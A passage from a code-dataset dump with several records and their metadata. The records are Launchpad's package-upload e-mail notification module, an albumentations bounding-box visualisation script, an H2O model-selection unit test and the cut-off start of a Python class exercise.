changes,\n action, previous_version=None):\n \"\"\"Assemble the e-mail notification body.\"\"\"\n if changes is None:\n changes = {}\n info = fetch_information(\n spr, bprs, changes, previous_version=previous_version)\n information = {\n 'STATUS': ACTION_DESCRIPTIONS[action],\n 'SUMMARY': summary,\n 'DATE': 'Date: %s' % info['date'],\n 'CHANGESFILE': info['changelog'],\n 'DISTRO': distroseries.distribution.title,\n 'ANNOUNCE': 'No announcement sent',\n 'CHANGEDBY': '',\n 'MAINTAINER': '',\n 'ORIGIN': '',\n 'SIGNER': '',\n 'SPR_URL': '',\n 'ARCHIVE_URL': '\\n%s' % canonical_url(archive),\n 'USERS_ADDRESS': config.launchpad.users_address,\n }\n if spr:\n # Yay, circular imports.\n from lp.soyuz.model.distroseriessourcepackagerelease import (\n DistroSeriesSourcePackageRelease,\n )\n dsspr = DistroSeriesSourcePackageRelease(distroseries, spr)\n information['SPR_URL'] = canonical_url(dsspr)\n changedby_displayname = info['changedby_displayname']\n if changedby_displayname:\n information['CHANGEDBY'] = '\\nChanged-By: %s' % changedby_displayname\n origin = changes.get('Origin')\n if origin:\n information['ORIGIN'] = '\\nOrigin: %s' % origin\n if action == 'unapproved':\n information['SUMMARY'] += (\n \"\\nThis upload awaits approval by a distro manager\\n\")\n if distroseries.changeslist:\n information['ANNOUNCE'] = \"Announcing to %s\" % (\n distroseries.changeslist)\n\n # Some syncs (e.g. from Debian) will involve packages whose\n # changed-by person was auto-created in LP and hence does not have a\n # preferred email address set. 
We'll get a None here.\n    changedby_person = email_to_person(info['changedby'])\n\n    if blamer is not None and blamer != changedby_person:\n        signer_signature = person_to_email(blamer)\n        if signer_signature != info['changedby']:\n            information['SIGNER'] = '\\nSigned-By: %s' % signer_signature\n    # Add maintainer if present and different from changed-by.\n    maintainer = info['maintainer']\n    changedby = info['changedby']\n    if maintainer and maintainer != changedby:\n        information['MAINTAINER'] = '\\nMaintainer: %s' % maintainer\n    return get_template(archive, action) % information\n\n\ndef send_mail(\n    spr, archive, to_addrs, subject, mail_text, dry_run, from_addr=None,\n    bcc=None, changesfile_content=None, attach_changes=False, logger=None):\n    \"\"\"Send an email to to_addrs with the given text and subject.\n\n    :param spr: The `ISourcePackageRelease` to be notified about.\n    :param archive: The target `IArchive`.\n    :param to_addrs: A list of email addresses to be used as recipients.\n        Each email must be a valid ASCII str instance or a unicode one.\n    :param subject: The email's subject.\n    :param mail_text: The text body of the email. Unicode is preserved in the\n        email.\n    :param dry_run: Whether or not an email should actually be sent. But\n        please note that this flag is (largely) ignored.\n    :param from_addr: The email address to be used as the sender. Must be a\n        valid ASCII str instance or a unicode one. Defaults to the email\n        for config.uploader.\n    :param bcc: Optional email Blind Carbon Copy address(es).\n    :param changesfile_content: The content of the actual changesfile.\n    :param attach_changes: A flag governing whether the original changesfile\n        content shall be attached to the email.\n    \"\"\"\n    extra_headers = {'X-Katie': 'Launchpad actually'}\n\n    # Include the 'X-Launchpad-PPA' header for PPA upload notifications\n    # containing the PPA owner name.\n    if archive.is_ppa:\n        extra_headers['X-Launchpad-PPA'] = get_ppa_reference(archive)\n\n    # Include a 'X-Launchpad-Component' header with the component and\n    # the section of the source package uploaded in order to facilitate\n    # filtering on the part of the email recipients.\n    if spr:\n        xlp_component_header = 'component=%s, section=%s' % (\n            spr.component.name, spr.section.name)\n        extra_headers['X-Launchpad-Component'] = xlp_component_header\n\n    if from_addr is None:\n        from_addr = format_address(\n            config.uploader.default_sender_name,\n            config.uploader.default_sender_address)\n\n    # `sendmail`, despite handling unicode message bodies, can't\n    # cope with non-ascii sender/recipient addresses, so ascii_smash\n    # is used on all addresses.\n\n    # All emails from here have a Bcc to the default recipient.\n    bcc_text = format_address(\n        config.uploader.default_recipient_name,\n        config.uploader.default_recipient_address)\n    if bcc:\n        bcc_text = \"%s, %s\" % (bcc_text, bcc)\n    extra_headers['Bcc'] = ascii_smash(bcc_text)\n\n    recipients = ascii_smash(\", \".join(to_addrs))\n    if isinstance(from_addr, unicode):\n        # ascii_smash only works on unicode strings.\n        from_addr = ascii_smash(from_addr)\n    else:\n        from_addr.encode('ascii')\n\n    if dry_run and logger is not None:\n        debug(logger, \"Would have sent a mail:\")\n    else:\n        debug(logger, \"Sent a mail:\")\n    debug(logger, \"  Subject: %s\" % subject)\n    debug(logger, \"  Sender: %s\" % from_addr)\n    debug(logger, \"  Recipients: %s\" % recipients)\n    if 'Bcc' in extra_headers:\n        debug(logger, \"  Bcc: %s\" % extra_headers['Bcc'])\n    debug(logger, \"  Body:\")\n    for line in mail_text.splitlines():\n        if isinstance(line, 
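# ----------------------------------------------------------------------
# Illustrative sketch (standalone, Python 3 equivalent of the Python 2
# code above, with hypothetical addresses; not part of the original
# record): how send_mail assembles the message -- a multipart body plus
# the changes file as a named text attachment.
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

message = MIMEMultipart()
message['from'] = 'Uploader <uploader@example.com>'
message['to'] = 'Recipient <recipient@example.com>'
message['subject'] = '[ubuntu/breezy] hello 1.0 (Accepted)'
message.attach(MIMEText('Accepted.', 'plain', 'utf-8'))
attachment = MIMEText('Format: 1.8', 'plain', 'utf-8')
attachment.add_header(
    'Content-Disposition', 'attachment; filename="changesfile"')
message.attach(attachment)
assert message.is_multipart()
# ----------------------------------------------------------------------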
str):\n line = line.decode('utf-8', 'replace')\n debug(logger, line)\n\n if not dry_run:\n # Since we need to send the original changesfile as an\n # attachment the sendmail() method will be used as opposed to\n # simple_sendmail().\n message = MIMEMultipart()\n message['from'] = from_addr\n message['subject'] = subject\n message['to'] = recipients\n\n # Set the extra headers if any are present.\n for key, value in extra_headers.iteritems():\n message.add_header(key, value)\n\n # Add the email body.\n message.attach(\n MIMEText(sanitize_string(mail_text).encode('utf-8'),\n 'plain', 'utf-8'))\n\n if attach_changes:\n # Add the original changesfile as an attachment.\n if changesfile_content is not None:\n changesfile_text = sanitize_string(changesfile_content)\n else:\n changesfile_text = (\"Sorry, changesfile not available.\")\n\n attachment = MIMEText(\n changesfile_text.encode('utf-8'), 'plain', 'utf-8')\n attachment.add_header(\n 'Content-Disposition',\n 'attachment; filename=\"changesfile\"')\n message.attach(attachment)\n\n # And finally send the message.\n sendmail(message)\n\n\ndef sanitize_string(s):\n \"\"\"Make sure string does not trigger 'ascii' codec errors.\n\n Convert string to unicode if needed so that characters outside\n the (7-bit) ASCII range do not cause errors like these:\n\n 'ascii' codec can't decode byte 0xc4 in position 21: ordinal\n not in range(128)\n \"\"\"\n if isinstance(s, unicode):\n return s\n else:\n return guess_encoding(s)\n\n\ndef debug(logger, msg, *args, **kwargs):\n \"\"\"Shorthand debug notation for publish() methods.\"\"\"\n if logger is not None:\n logger.debug(msg, *args, **kwargs)\n\n\ndef is_valid_uploader(person, distribution):\n \"\"\"Is `person` an uploader for `distribution`?\n\n A `None` person is not an uploader.\n \"\"\"\n if person is None:\n return None\n else:\n return not getUtility(IArchivePermissionSet).componentsForUploader(\n distribution.main_archive, person).is_empty()\n\n\ndef get_upload_notification_recipients(blamer, archive, distroseries,\n logger=None, changes=None, spr=None,\n bprs=None):\n \"\"\"Return a list of recipients for notification emails.\"\"\"\n debug(logger, \"Building recipients list.\")\n candidate_recipients = [blamer]\n info = fetch_information(spr, bprs, changes)\n\n changer = email_to_person(info['changedby'])\n maintainer = email_to_person(info['maintainer'])\n\n if blamer is None and not archive.is_copy:\n debug(logger, \"Changes file is unsigned; adding changer as recipient.\")\n candidate_recipients.append(changer)\n\n if archive.is_ppa:\n # For PPAs, any person or team mentioned explicitly in the\n # ArchivePermissions as uploaders for the archive will also\n # get emailed.\n candidate_recipients.extend([\n permission.person\n for permission in archive.getUploadersForComponent()])\n elif archive.is_copy:\n # For copy archives, notifying anyone else will probably only\n # confuse them.\n pass\n else:\n # If this is not a PPA, we also consider maintainer and changed-by.\n if blamer is not None:\n if is_valid_uploader(maintainer, distroseries.distribution):\n debug(logger, \"Adding maintainer to recipients\")\n candidate_recipients.append(maintainer)\n\n if is_valid_uploader(changer, distroseries.distribution):\n debug(logger, \"Adding changed-by to recipients\")\n candidate_recipients.append(changer)\n\n # Collect email addresses to notify. 
Skip persons who do not have a\n # preferredemail set, such as people who have not activated their\n # Launchpad accounts (and are therefore not expecting this email).\n recipients = [\n format_address_for_person(person)\n for person in filter(None, set(candidate_recipients))\n if person.preferredemail is not None]\n\n for recipient in recipients:\n debug(logger, \"Adding recipient: '%s'\", recipient)\n\n return recipients\n\n\ndef build_uploaded_files_list(spr, builds, customfiles, logger):\n \"\"\"Return a list of tuples of (filename, component, section).\n\n Component and section are only set where the file is a source upload.\n If an empty list is returned, it means there are no files.\n Raises LanguagePackRejection if a language pack is detected.\n No emails should be sent for language packs.\n \"\"\"\n files = []\n # Bail out early if this is an upload for the translations\n # section.\n if spr:\n if spr.section.name == 'translations':\n debug(logger,\n \"Skipping acceptance and announcement, it is a \"\n \"language-package upload.\")\n raise LanguagePackEncountered\n for sprfile in spr.files:\n files.append(\n (sprfile.libraryfile.filename, spr.component.name,\n spr.section.name))\n\n # Component and section don't get set for builds and custom, since\n # this information is only used in the summary string for source\n # uploads.\n for build in builds:\n for bpr in build.build.binarypackages:\n files.extend([\n (bpf.libraryfile.filename, '', '') for bpf in bpr.files])\n\n if customfiles:\n files.extend(\n [(file.libraryfilealias.filename, '', '') for file in customfiles])\n\n return files\n\n\ndef build_summary(spr, files, action):\n \"\"\"Build a summary string based on the files present in the upload.\"\"\"\n summary = []\n for filename, component, section in files:\n if action == 'new':\n summary.append(\"NEW: %s\" % filename)\n else:\n summary.append(\" OK: %s\" % filename)\n if filename.endswith(\"dsc\"):\n summary.append(\" -> Component: %s Section: %s\" % (\n component, section))\n return summary\n\n\ndef email_to_person(fullemail):\n \"\"\"Return an `IPerson` given an RFC2047 email address.\n\n :param fullemail: Potential email address.\n :return: `IPerson` with the given email address. None if there\n isn't one, or if `fullemail` isn't a proper email address.\n \"\"\"\n if not fullemail:\n return None\n\n try:\n # The 2nd arg to s_f_m() doesn't matter as it won't fail since every-\n # thing will have already parsed at this point.\n rfc822, rfc2047, name, email = safe_fix_maintainer(fullemail, \"email\")\n return getUtility(IPersonSet).getByEmail(email)\n except ParseMaintError:\n return None\n\n\ndef person_to_email(person):\n \"\"\"Return a string of full name given an IPerson.\"\"\"\n if person and person.preferredemail:\n # This will use email.Header to encode any non-ASCII characters.\n return format_address_for_person(person)\n\n\ndef is_auto_sync_upload(spr, bprs, pocket, changed_by_email):\n \"\"\"Return True if this is a (Debian) auto sync upload.\n\n Sync uploads are source-only, unsigned and not targeted to\n the security pocket. 
The Changed-By field is also the Katie\n user (archive@ubuntu.com).\n \"\"\"\n changed_by = email_to_person(changed_by_email)\n return (\n spr and\n not bprs and\n changed_by == getUtility(ILaunchpadCelebrities).katie and\n pocket != PackagePublishingPocket.SECURITY)\n\n\ndef fetch_information(spr, bprs, changes, previous_version=None):\n changedby = None\n changedby_displayname = None\n maintainer = None\n maintainer_displayname = None\n\n if changes:\n changesfile = ChangesFile.formatChangesComment(\n sanitize_string(changes.get('Changes')))\n date = changes.get('Date')\n changedby = sanitize_string(changes.get('Changed-By'))\n maintainer = sanitize_string(changes.get('Maintainer'))\n changedby_displayname = changedby\n maintainer_displayname = maintainer\n elif spr or bprs:\n if not spr and bprs:\n spr = bprs[0].build.source_package_release\n changesfile = spr.aggregate_changelog(previous_version)\n date = spr.dateuploaded\n changedby = person_to_email(spr.creator)\n maintainer = person_to_email(spr.maintainer)\n if changedby:\n addr = formataddr((spr.creator.displayname,\n spr.creator.preferredemail.email))\n changedby_displayname = sanitize_string(addr)\n if maintainer:\n addr = formataddr((spr.maintainer.displayname,\n spr.maintainer.preferredemail.email))\n maintainer_displayname = sanitize_string(addr)\n else:\n changesfile = date = None\n\n return {\n 'changelog': changesfile,\n 'date': date,\n 'changedby': changedby,\n 'changedby_displayname': changedby_displayname,\n 'maintainer': maintainer,\n 'maintainer_displayname': maintainer_displayname,\n }\n\n\nclass LanguagePackEncountered(Exception):\n \"\"\"Thrown when not wanting to email notifications for language packs.\"\"\"\n", "repo_name": "abramhindle/UnnaturalCodeFork", "sub_path": "python/testdata/launchpad/lib/lp/soyuz/adapters/notification.py", "file_name": "notification.py", "file_ext": "py", "file_size_in_byte": 24938, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.split", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "lp.services.config.config.launchpad", "line_number": 60, "usage_type": "attribute"}, {"api_name": "lp.services.config.config", "line_number": 60, "usage_type": "name"}, {"api_name": "lp.archivepublisher.utils.get_ppa_reference", "line_number": 64, "usage_type": "call"}, {"api_name": "lp.services.webapp.canonical_url", "line_number": 65, "usage_type": "call"}, {"api_name": "lp.services.mail.helpers.get_email_template", "line_number": 89, "usage_type": "call"}, {"api_name": "lp.archivepublisher.utils.get_ppa_reference", "line_number": 120, "usage_type": "call"}, {"api_name": "lp.registry.interfaces.pocket.PackagePublishingPocket.SECURITY", "line_number": 157, "usage_type": "attribute"}, {"api_name": "lp.registry.interfaces.pocket.PackagePublishingPocket", "line_number": 157, "usage_type": "name"}, {"api_name": "lp.services.config.config.uploader", "line_number": 199, "usage_type": "attribute"}, {"api_name": "lp.services.config.config", "line_number": 199, "usage_type": "name"}, {"api_name": "lp.services.config.config.uploader", "line_number": 200, "usage_type": "attribute"}, {"api_name": "lp.services.config.config", "line_number": 200, "usage_type": "name"}, {"api_name": "lp.services.mail.sendmail.format_address_for_person", "line_number": 234, "usage_type": "call"}, {"api_name": 
"lp.registry.interfaces.pocket.PackagePublishingPocket.BACKPORTS", "line_number": 241, "usage_type": "attribute"}, {"api_name": "lp.registry.interfaces.pocket.PackagePublishingPocket", "line_number": 241, "usage_type": "name"}, {"api_name": "lp.registry.interfaces.pocket.PackagePublishingPocket.SECURITY", "line_number": 242, "usage_type": "attribute"}, {"api_name": "lp.registry.interfaces.pocket.PackagePublishingPocket", "line_number": 242, "usage_type": "name"}, {"api_name": "lp.services.webapp.canonical_url", "line_number": 279, "usage_type": "call"}, {"api_name": "lp.services.config.config.launchpad", "line_number": 280, "usage_type": "attribute"}, {"api_name": "lp.services.config.config", "line_number": 280, "usage_type": "name"}, {"api_name": "lp.soyuz.model.distroseriessourcepackagerelease.DistroSeriesSourcePackageRelease", "line_number": 287, "usage_type": "call"}, {"api_name": "lp.services.webapp.canonical_url", "line_number": 288, "usage_type": "call"}, {"api_name": "lp.archivepublisher.utils.get_ppa_reference", "line_number": 346, "usage_type": "call"}, {"api_name": "lp.services.mail.sendmail.format_address", "line_number": 357, "usage_type": "call"}, {"api_name": "lp.services.config.config.uploader", "line_number": 358, "usage_type": "attribute"}, {"api_name": "lp.services.config.config", "line_number": 358, "usage_type": "name"}, {"api_name": "lp.services.config.config.uploader", "line_number": 359, "usage_type": "attribute"}, {"api_name": "lp.services.config.config", "line_number": 359, "usage_type": "name"}, {"api_name": "lp.services.mail.sendmail.format_address", "line_number": 366, "usage_type": "call"}, {"api_name": "lp.services.config.config.uploader", "line_number": 367, "usage_type": "attribute"}, {"api_name": "lp.services.config.config", "line_number": 367, "usage_type": "name"}, {"api_name": "lp.services.config.config.uploader", "line_number": 368, "usage_type": "attribute"}, {"api_name": "lp.services.config.config", "line_number": 368, "usage_type": "name"}, {"api_name": "lp.services.encoding.ascii_smash", "line_number": 371, "usage_type": "call"}, {"api_name": "lp.services.encoding.ascii_smash", "line_number": 373, "usage_type": "call"}, {"api_name": "lp.services.encoding.ascii_smash", "line_number": 376, "usage_type": "call"}, {"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 399, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 410, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 420, "usage_type": "call"}, {"api_name": "lp.services.mail.sendmail.sendmail", "line_number": 428, "usage_type": "call"}, {"api_name": "lp.services.encoding.guess", "line_number": 443, "usage_type": "call"}, {"api_name": "zope.component.getUtility", "line_number": 460, "usage_type": "call"}, {"api_name": "lp.soyuz.interfaces.archivepermission.IArchivePermissionSet", "line_number": 460, "usage_type": "argument"}, {"api_name": "lp.services.mail.sendmail.format_address_for_person", "line_number": 505, "usage_type": "call"}, {"api_name": "email.mime.multipart", "line_number": 579, "usage_type": "name"}, {"api_name": "lp.archiveuploader.utils.safe_fix_maintainer", "line_number": 579, "usage_type": "call"}, {"api_name": "email.mime.multipart", "line_number": 580, "usage_type": "argument"}, {"api_name": "zope.component.getUtility", "line_number": 580, "usage_type": "call"}, {"api_name": "lp.registry.interfaces.person.IPersonSet", "line_number": 580, "usage_type": "argument"}, {"api_name": 
"lp.archiveuploader.utils.ParseMaintError", "line_number": 581, "usage_type": "name"}, {"api_name": "lp.services.mail.sendmail.format_address_for_person", "line_number": 589, "usage_type": "call"}, {"api_name": "zope.component.getUtility", "line_number": 603, "usage_type": "call"}, {"api_name": "lp.app.interfaces.launchpad.ILaunchpadCelebrities", "line_number": 603, "usage_type": "argument"}, {"api_name": "lp.registry.interfaces.pocket.PackagePublishingPocket.SECURITY", "line_number": 604, "usage_type": "attribute"}, {"api_name": "lp.registry.interfaces.pocket.PackagePublishingPocket", "line_number": 604, "usage_type": "name"}, {"api_name": "lp.archiveuploader.changesfile.ChangesFile.formatChangesComment", "line_number": 614, "usage_type": "call"}, {"api_name": "lp.archiveuploader.changesfile.ChangesFile", "line_number": 614, "usage_type": "name"}, {"api_name": "email.utils.formataddr", "line_number": 629, "usage_type": "call"}, {"api_name": "email.utils.formataddr", "line_number": 633, "usage_type": "call"}]} +{"seq_id": "33553633202", "text": "'''\nPlease provide index as input when running this script\nUsed to check if transforms are at all adequate.\n'''\n\nimport cv2\nimport pandas as pd\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\n\nimport albumentations as A\nimport albumentations.pytorch\n\nimport config\n\n# dataframe\ndf = pd.read_csv(config.DF_PATH, usecols=['fname', 'height', 'width', 'xmin_coco', 'ymin_coco', 'xmax_coco', 'ymax_coco', 'label'])\n\n# fetch random index\n# idx = np.random.randint(df.shape[0])\n\n# input\nidx = int(input(f'Please provide a picture index between 0 and {df.shape[0]}: '))\n\n# pull image data with random index OR provide index below\nimg_data = df.iloc[idx]\n\n# you can provide index here\n# img_data = df.iloc[477]\n\n# image path\npath = img_data['fname']\n\n# open image\nimage = cv2.imread(path)\nimage = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n# rectangle coordinates\nx1 = img_data['xmin_coco']\ny1 = img_data['ymin_coco']\nx2 = img_data['xmax_coco'] - x1\ny2 = img_data['ymax_coco'] - y1\n\nBOX_COLOR = (255, 0, 0) # Red\nTEXT_COLOR = (255, 255, 255) # White\n\n\ndef visualize_bbox(image, bboxes, class_name, color=BOX_COLOR, thickness=2):\n \"\"\"Visualizes a single bounding box on the image\"\"\"\n x_min, y_min, w, h = bboxes\n x_min, x_max, y_min, y_max = int(x_min), int(\n x_min + w), int(y_min), int(y_min + h)\n\n cv2.rectangle(image, (x_min, y_min), (x_max, y_max),\n color=color, thickness=thickness)\n\n ((text_width, text_height), _) = cv2.getTextSize(\n class_name, cv2.FONT_HERSHEY_SIMPLEX, 0.35, 1)\n cv2.rectangle(image, (x_min, y_min - int(1.3 * text_height)),\n (x_min + text_width, y_min), BOX_COLOR, -1)\n cv2.putText(\n image,\n text=class_name,\n org=(x_min, y_min - int(0.3 * text_height)),\n fontFace=cv2.FONT_HERSHEY_SIMPLEX,\n fontScale=0.35,\n color=TEXT_COLOR,\n lineType=cv2.LINE_AA,\n )\n return image\n\n\ndef visualize(image, bboxes, label, category_id_to_name):\n '''\n Visualize picture with the bbox.\n '''\n image = image.copy()\n for bboxes, category_id in zip(bboxes, label):\n class_name = category_id_to_name[category_id]\n image = visualize_bbox(image, bboxes, class_name)\n plt.figure(figsize=(12, 12))\n plt.axis('off')\n plt.imshow(image)\n plt.show()\n\n\n# has to be list of lists because there is for loop for the bboxes\nbboxes = [[x1, y1, x2, y2]]\n# fetch image class\nlabel = [img_data.label]\n# mapping used to display the class\ncategory_id_to_name = {1: 'cat', 0: 'dog'}\n\n# WITH 
TRANSFORMS\n\ntransform = A.Compose([\n # A.SmallestMaxSize(presize),\n # A.LongestMaxSize(presize),\n A.RandomSizedBBoxSafeCrop(config.presize, config.presize),\n # A.crops.transforms.CropAndPad(presize),\n # A.RandomCrop(crop, crop),\n # A.Normalize(),\n A.Rotate(limit=30),\n A.HorizontalFlip(p=0.5),\n A.Cutout(p=1.0),\n # albumentations.pytorch.ToTensorV2(),\n],\n # bbox_params=A.BboxParams(format='coco'),\n bbox_params=A.BboxParams(format='coco', label_fields=['label']),\n)\n\n# transformed = transform(image=image, bboxes=bboxes)\ntransformed = transform(image=image,\n bboxes=bboxes,\n label=label)\n\n\nvisualize(\n transformed['image'],\n transformed['bboxes'],\n transformed['label'],\n category_id_to_name\n)\n", "repo_name": "olegperegudov/computer-vision", "sub_path": "cat dogs classifier/src/check_bbox_with_transforms.py", "file_name": "check_bbox_with_transforms.py", "file_ext": "py", "file_size_in_byte": 3333, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.read_csv", "line_number": 18, "usage_type": "call"}, {"api_name": "config.DF_PATH", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 36, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 37, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 54, "usage_type": "call"}, {"api_name": "cv2.getTextSize", "line_number": 57, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 58, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 59, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 61, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 65, "usage_type": "attribute"}, {"api_name": "cv2.LINE_AA", "line_number": 68, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "albumentations.Compose", "line_number": 96, "usage_type": "call"}, {"api_name": "albumentations.RandomSizedBBoxSafeCrop", "line_number": 99, "usage_type": "call"}, {"api_name": "config.presize", "line_number": 99, "usage_type": "attribute"}, {"api_name": "albumentations.Rotate", "line_number": 103, "usage_type": "call"}, {"api_name": "albumentations.HorizontalFlip", "line_number": 104, "usage_type": "call"}, {"api_name": "albumentations.Cutout", "line_number": 105, "usage_type": "call"}, {"api_name": "albumentations.BboxParams", "line_number": 109, "usage_type": "call"}]} +{"seq_id": "13349403664", "text": "import sys\nsys.path.insert(1, \"../../../\")\nimport h2o\nfrom tests import pyunit_utils\nfrom h2o.estimators.model_selection import H2OModelSelectionEstimator as modelSelection\n\n# test modelselection algorithm for regression only. Make sure the result frame contains the correct information. 
Make\n# sure that we can instantiate the best model from model ID, perform scoring with it.\ndef test_gaussian_result_frame_model_id():\n d = h2o.import_file(path=pyunit_utils.locate(\"smalldata/logreg/prostate.csv\"))\n my_y = \"GLEASON\"\n my_x = [\"AGE\",\"RACE\",\"CAPSULE\",\"DCAPS\",\"PSA\",\"VOL\",\"DPROS\"]\n \n maxr_model = modelSelection(seed=12345, max_predictor_number=7, mode=\"maxr\")\n maxr_model.train(training_frame=d, x=my_x, y=my_y)\n maxrsweep_model = modelSelection(seed=12345, max_predictor_number=7, mode=\"maxrsweep\", build_glm_model=True)\n maxrsweep_model.train(training_frame=d, x=my_x, y=my_y)\n maxrsweep_model_glm = modelSelection(seed=12345, max_predictor_number=7, mode=\"maxrsweep\")\n maxrsweep_model_glm.train(training_frame=d, x=my_x, y=my_y)\n maxrsweep_model_MM = modelSelection(seed=12345, max_predictor_number=7, mode=\"maxrsweep\", multinode_mode=True)\n maxrsweep_model_MM.train(training_frame=d, x=my_x, y=my_y)\n\n # make sure results returned by maxr and maxrsweep are the same\n pyunit_utils.compare_frames_local(maxrsweep_model_MM.result()[2:4], maxrsweep_model_glm.result()[2:4], prob=1.0, tol=1e-6)\n pyunit_utils.compare_frames_local(maxr_model.result()[2:4], maxrsweep_model.result()[2:4], prob=1.0, tol=1e-6)\n pyunit_utils.compare_frames_local(maxr_model.result()[2:4], maxrsweep_model_glm.result()[1:3], prob=1.0, tol=1e-6)\n \n allsubsets_model = modelSelection(seed=12345, max_predictor_number=7, mode=\"allsubsets\")\n allsubsets_model.train(training_frame=d, x=my_x, y=my_y)\n result_frame_allsubsets = allsubsets_model.result()\n numRows = result_frame_allsubsets.nrows\n best_r2_allsubsets = allsubsets_model.get_best_R2_values()\n result_frame_maxr = maxr_model.result()\n best_r2_maxr = maxr_model.get_best_R2_values()\n for ind in list(range(numRows)):\n # r2 from attributes\n best_r2_value_allsubsets = best_r2_allsubsets[ind]\n one_model_allsubsets = h2o.get_model(result_frame_allsubsets[\"model_id\"][ind, 0])\n pred_allsubsets = one_model_allsubsets.predict(d)\n print(\"last element of predictor frame: {0}\".format(pred_allsubsets[pred_allsubsets.nrows-1,pred_allsubsets.ncols-1]))\n assert pred_allsubsets.nrows == d.nrows, \"expected dataset row: {0}, actual dataset row: \" \\\n \"{1}\".format(pred_allsubsets.nrows, d.nrows)\n best_r2_value_maxr = best_r2_maxr[ind]\n one_model_maxr = h2o.get_model(result_frame_maxr[\"model_id\"][ind, 0])\n pred_maxr = one_model_maxr.predict(d)\n pyunit_utils.compare_frames_local(pred_maxr, pred_allsubsets, prob=1, tol=1e-6) # compare allsubsets and maxr results\n # r2 from result frame\n frame_r2_allsubsets = result_frame_allsubsets[\"best_r2_value\"][ind,0]\n # r2 from model\n model_r2_allsubsets = one_model_allsubsets.r2()\n # make sure all r2 are equal\n assert abs(best_r2_value_allsubsets-frame_r2_allsubsets) < 1e-6, \"expected best r2: {0}, actual best r2: \" \\\n \"{1}\".format(best_r2_value_allsubsets, frame_r2_allsubsets)\n assert abs(frame_r2_allsubsets-model_r2_allsubsets) < 1e-6, \"expected best r2: {0}, actual best r2: \" \\\n \"{1}\".format(model_r2_allsubsets, frame_r2_allsubsets)\n assert abs(best_r2_value_maxr-model_r2_allsubsets) < 1e-6, \"expected best r2: {0}, maxr best r2: {1}\" \\\n \"\".format(best_r2_value_maxr, model_r2_allsubsets)\n \n\nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(test_gaussian_result_frame_model_id)\nelse:\n test_gaussian_result_frame_model_id()\n", "repo_name": "h2oai/h2o-3", "sub_path": 
"h2o-py/tests/testdir_algos/modelselection/pyunit_PUBDEV_8785_8346_8703_modelselection_result_frame.py", "file_name": "pyunit_PUBDEV_8785_8346_8703_modelselection_result_frame.py", "file_ext": "py", "file_size_in_byte": 4066, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6553, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.path.insert", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "h2o.import_file", "line_number": 10, "usage_type": "call"}, {"api_name": "tests.pyunit_utils.locate", "line_number": 10, "usage_type": "call"}, {"api_name": "tests.pyunit_utils", "line_number": 10, "usage_type": "name"}, {"api_name": "h2o.estimators.model_selection.H2OModelSelectionEstimator", "line_number": 14, "usage_type": "call"}, {"api_name": "h2o.estimators.model_selection.H2OModelSelectionEstimator", "line_number": 16, "usage_type": "call"}, {"api_name": "h2o.estimators.model_selection.H2OModelSelectionEstimator", "line_number": 18, "usage_type": "call"}, {"api_name": "h2o.estimators.model_selection.H2OModelSelectionEstimator", "line_number": 20, "usage_type": "call"}, {"api_name": "tests.pyunit_utils.compare_frames_local", "line_number": 24, "usage_type": "call"}, {"api_name": "tests.pyunit_utils", "line_number": 24, "usage_type": "name"}, {"api_name": "tests.pyunit_utils.compare_frames_local", "line_number": 25, "usage_type": "call"}, {"api_name": "tests.pyunit_utils", "line_number": 25, "usage_type": "name"}, {"api_name": "tests.pyunit_utils.compare_frames_local", "line_number": 26, "usage_type": "call"}, {"api_name": "tests.pyunit_utils", "line_number": 26, "usage_type": "name"}, {"api_name": "h2o.estimators.model_selection.H2OModelSelectionEstimator", "line_number": 28, "usage_type": "call"}, {"api_name": "h2o.get_model", "line_number": 38, "usage_type": "call"}, {"api_name": "h2o.get_model", "line_number": 44, "usage_type": "call"}, {"api_name": "tests.pyunit_utils.compare_frames_local", "line_number": 46, "usage_type": "call"}, {"api_name": "tests.pyunit_utils", "line_number": 46, "usage_type": "name"}, {"api_name": "tests.pyunit_utils.standalone_test", "line_number": 61, "usage_type": "call"}, {"api_name": "tests.pyunit_utils", "line_number": 61, "usage_type": "name"}]} +{"seq_id": "28878136191", "text": "\"\"\"Bite 138. OOP fun at the Zoo.\"\"\"\n\nfrom typing import Dict\n\n\nclass Animal:\n \"\"\"Animal object.\"\"\"\n\n counter = 10000\n animals: Dict[str, int] = {}\n\n def __init__(self, name: str):\n \"\"\"Create the object.\"\"\"\n if name not in Animal.animals: # let's not have duplicates\n 